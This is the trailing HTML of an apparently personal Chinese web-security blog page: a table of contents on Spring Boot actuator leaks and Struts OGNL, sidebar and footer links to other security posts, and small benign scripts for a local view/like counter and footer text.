class="toc-text"> 常规外网打点（持续更新中......）</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#spring-boot"><span class="toc-number">2.</span> <span class="toc-text"> spring-boot</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#actuator%E6%B3%84%E9%9C%B2"><span class="toc-number">2.1.</span> <span class="toc-text"> actuator泄露</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1x%E7%89%88%E6%9C%AC"><span class="toc-number">2.1.1.</span> <span class="toc-text"> 1.x版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2x%E7%89%88%E6%9C%AC"><span class="toc-number">2.1.2.</span> <span class="toc-text"> 2.x版本</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#heapdump"><span class="toc-number">2.1.2.1.</span> <span class="toc-text"> heapdump</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#jolokia"><span class="toc-number">2.1.2.2.</span> <span class="toc-text"> jolokia</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%95%E8%BF%87waf%E7%9A%84%E4%B8%80%E4%BA%9B%E7%9B%B8%E5%85%B3%E6%96%B9%E6%B3%95"><span class="toc-number">2.1.3.</span> <span class="toc-text"> 绕过waf的一些相关方法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B"><span class="toc-number">2.2.</span> <span class="toc-text"> 实例</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#vps"><span class="toc-number">2.2.1.</span> <span class="toc-text"> VPS</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#struts"><span class="toc-number">3.</span> <span class="toc-text"> struts</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ognl"><span class="toc-number">3.1.</span> <span class="toc-text"> OGNL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#s2-001cve-2007-4556"><span class="toc-number">3.2.</span> <span class="toc-text"> S2-001（CVE-2007-4556）</span></a></li></ol></li></ol></div><div class="related panel pjax" data-title="系列文章"></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="ZLARYY" src="/assets/avertar.png"/><p class="name" itemprop="name">ZLARYY</p><div class="description" itemprop="description">Web安全 / CTF / 个人学习笔记</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">15</span><span class="name">文章</span></a></div></nav><div class="social"><a target="_blank" rel="noopener" href="https://github.com/ZLARYY123" class="item github" title="https:&#x2F;&#x2F;github.com&#x2F;ZLARYY123"><i class="ic i-github"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>友链</a></li><li class="item"><a href="/essay/" rel="section"><i class="ic i-calendar"></i>essay</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2026/05/29/%E5%85%B6%E4%BB%96%E7%B3%BB%E7%BB%9F%E5%BA%93%E7%B1%BB%E5%9E%8B%E4%B8%8B%E7%9A%84SQL%E6%B3%A8%E5%85%A5/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2026/04/23/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div><div id="player"></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/20/Pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8EPython%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/">Pickle反序列化与Python原型链污染</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/06/18/SQL%E6%8F%90%E6%9D%83/">SQL提权</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/">沙箱逃逸</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/12/SSRF/">SSRF</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/05/29/%E5%85%B6%E4%BB%96%E7%B3%BB%E7%BB%9F%E5%BA%93%E7%B1%BB%E5%9E%8B%E4%B8%8B%E7%9A%84SQL%E6%B3%A8%E5%85%A5/">其他系统库类型下的SQL注入</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/">低版本php下信息泄露的CVE漏洞与反弹shell</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/28/RCE/">RCE</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/16/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">php反序列化</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/07/XXE/">XXE</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/10/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含</a></span></li></ul></div><div class="rpost pjax"><h2>最新评论</h2></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2026</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">ZLARYY @ ZLARYY</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">345k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">5:14</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & Theme.<a target="_blank" rel="noopener" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
    ispost: true,
    path: `2026/05/19/常规外网打点/`,
    favicon: {
        show: `ZLARYY`,
        hide: `ZLARYY`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    nocopy: "false",
    copyright: `复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。`,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    }
};
</script><script src="/js/siteInit.js?v=0.5.4" type="module" fetchpriority="high" defer></script><!-- hexo injector body_end start -->
<script id="post-stats">
(function () {
  var API_NAME = 'ZLARYYPostStats';
  var BOX_SELECTOR = '.post-stats-box';
  var COUNT_LIMIT = 9999;

  if (window[API_NAME] && typeof window[API_NAME].run === 'function') {
    window[API_NAME].run();
    return;
  }

  function isPostPage() {
    return !!(window.LOCAL && window.LOCAL.ispost) || !!document.querySelector('article.post');
  }

  function storageKey(prefix) {
    return prefix + window.location.pathname;
  }

  function getStorageValue(storage, key) {
    try {
      return storage.getItem(key);
    } catch (error) {
      return null;
    }
  }

  function setStorageValue(storage, key, value) {
    try {
      storage.setItem(key, value);
    } catch (error) {}
  }

  function removeStorageValue(storage, key) {
    try {
      storage.removeItem(key);
    } catch (error) {}
  }

  function readCount(key) {
    var raw = getStorageValue(window.localStorage, key);
    var value = raw === null || raw === '' ? 0 : Number(raw);

    if (!Number.isInteger(value) || value < 0 || value > COUNT_LIMIT) {
      value = 0;
      setStorageValue(window.localStorage, key, '0');
    }

    return value;
  }

  function writeCount(key, value) {
    setStorageValue(window.localStorage, key, String(value));
  }

  function bumpViewCount() {
    var countKey = storageKey('zlaryy_view_count_');
    var sessionKey = storageKey('zlaryy_viewed_session_');
    var count = readCount(countKey);

    if (getStorageValue(window.sessionStorage, sessionKey) !== '1') {
      if (count >= COUNT_LIMIT) count = 0;
      count += 1;
      writeCount(countKey, count);
      setStorageValue(window.sessionStorage, sessionKey, '1');
    }

    return count;
  }

  function readLikeCount() {
    return readCount(storageKey('zlaryy_like_count_'));
  }

  function hasLiked() {
    return getStorageValue(window.localStorage, storageKey('zlaryy_liked_')) === '1';
  }

  function saveLikeState(count, liked) {
    writeCount(storageKey('zlaryy_like_count_'), count);
    if (liked) {
      setStorageValue(window.localStorage, storageKey('zlaryy_liked_'), '1');
    } else {
      removeStorageValue(window.localStorage, storageKey('zlaryy_liked_'));
    }
  }

  function clearRewardNodes() {
    document.querySelectorAll('.reward').forEach(function (reward) {
      reward.innerHTML = '';
      reward.classList.add('post-stats-host');
      reward.removeAttribute('style');
      reward.setAttribute('aria-label', 'post stats');
    });
  }

  function findInsertTarget() {
    var reward = document.querySelector('article.post .reward, .reward');
    if (reward) return { parent: reward, before: null };

    var footer = document.querySelector('article.post > footer');
    if (footer && footer.parentNode) return { parent: footer.parentNode, before: footer };

    var article = document.querySelector('article.post');
    if (article) return { parent: article, before: null };

    return null;
  }

  function createStatsBox(viewCount, likeCount, liked) {
    var box = document.createElement('div');
    box.className = 'post-stats-box';
    box.innerHTML = [
      '<button class="post-view-count" type="button" disabled aria-disabled="true">',
      '&#128065; &#x770b;&#x8fc7; <span class="local-view-count">' + viewCount + '</span> &#x6b21;',
      '</button>',
      '<button class="post-like-btn' + (liked ? ' liked' : '') + '" type="button" aria-pressed="' + (liked ? 'true' : 'false') + '">',
      '<span class="post-like-label">' + (liked ? '&#x5df2;&#x70b9;&#x8d5e;' : '&#x70b9;&#x8d5e;') + '</span> ',
      '<span class="local-like-count">' + likeCount + '</span>',
      '</button>'
    ].join('');

    return box;
  }

  function updateLikeButton(button, count, liked) {
    var labelNode = button.querySelector('.post-like-label');
    var countNode = button.querySelector('.local-like-count');

    if (labelNode) labelNode.textContent = liked ? '\u5df2\u70b9\u8d5e' : '\u70b9\u8d5e';
    if (countNode) countNode.textContent = String(count);

    button.classList.toggle('liked', liked);
    button.setAttribute('aria-pressed', liked ? 'true' : 'false');
  }

  function bindLikeButton(box) {
    var button = box.querySelector('.post-like-btn');
    if (!button || button.dataset.bound === 'true') return;

    updateLikeButton(button, readLikeCount(), hasLiked());

    button.dataset.bound = 'true';
    button.addEventListener('click', function () {
      var count = readLikeCount();

      if (hasLiked()) {
        count = Math.max(0, count - 1);
        saveLikeState(count, false);
        updateLikeButton(button, count, false);
        return;
      }

      if (count >= COUNT_LIMIT) count = 0;
      count += 1;
      saveLikeState(count, true);
      updateLikeButton(button, count, true);
    });
  }

  function renderStats() {
    if (!isPostPage()) return;

    clearRewardNodes();

    var viewCount = bumpViewCount();
    var likeCount = readLikeCount();
    var liked = hasLiked();
    var box = document.querySelector(BOX_SELECTOR);

    if (!box) {
      var target = findInsertTarget();
      if (!target) return;

      box = createStatsBox(viewCount, likeCount, liked);
      target.parent.insertBefore(box, target.before);
    }

    var viewNode = box.querySelector('.local-view-count');
    var likeNode = box.querySelector('.local-like-count');
    var likeButton = box.querySelector('.post-like-btn');

    if (viewNode) viewNode.textContent = String(viewCount);
    if (likeNode) likeNode.textContent = String(likeCount);
    if (likeButton) {
      updateLikeButton(likeButton, likeCount, liked);
    }

    bindLikeButton(box);
  }

  function runPostStats() {
    window.setTimeout(renderStats, 0);
  }

  window[API_NAME] = {
    run: runPostStats
  };

  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', runPostStats);
  } else {
    runPostStats();
  }

  document.addEventListener('pjax:complete', runPostStats);
})();
</script>
  
<script>
(function () {
  function addBeian() {
    const footerStatus = document.querySelector('#footer .status');
    if (!footerStatus) return;

    if (document.querySelector('.footer-beian')) return;

    const beian = document.createElement('div');
    beian.className = 'footer-beian';
    beian.innerHTML = '<a href="https://beian.miit.gov.cn/" target="_blank" rel="noopener">蜀ICP备2026016552号-1</a>';

    footerStatus.appendChild(beian);
  }

  addBeian();
  document.addEventListener('pjax:complete', addBeian);
})();
</script>
  <script>
(function () {
  function fixText(text) {
    if (!text) return text;
    text = text.replace(/\([`´]?Д[`´]?\)大変だ!/g, "ZLARYY");
    text = text.replace(/大変だ!/g, "ZLARYY");
    return text;
  }

  function replaceText(root) {
    root = root || document.body;
    if (!root) return;

    var walker = document.createTreeWalker(root, NodeFilter.SHOW_TEXT, null, false);
    var node;

    while ((node = walker.nextNode())) {
      var oldText = node.nodeValue;
      var newText = fixText(oldText);
      if (newText !== oldText) node.nodeValue = newText;
    }
  }

  function init() {
    replaceText(document.body);

    var observer = new MutationObserver(function (mutations) {
      mutations.forEach(function (mutation) {
        mutation.addedNodes.forEach(function (node) {
          if (node.nodeType === 1) {
            replaceText(node);
          } else if (node.nodeType === 3) {
            node.nodeValue = fixText(node.nodeValue);
          }
        });
      });
    });

    observer.observe(document.body, {
      childList: true,
      subtree: true
    });
  }

  if (document.readyState === "loading") {
    document.addEventListener("DOMContentLoaded", init);
  } else {
    init();
  }
})();
</script><!-- hexo injector body_end end --></body></html>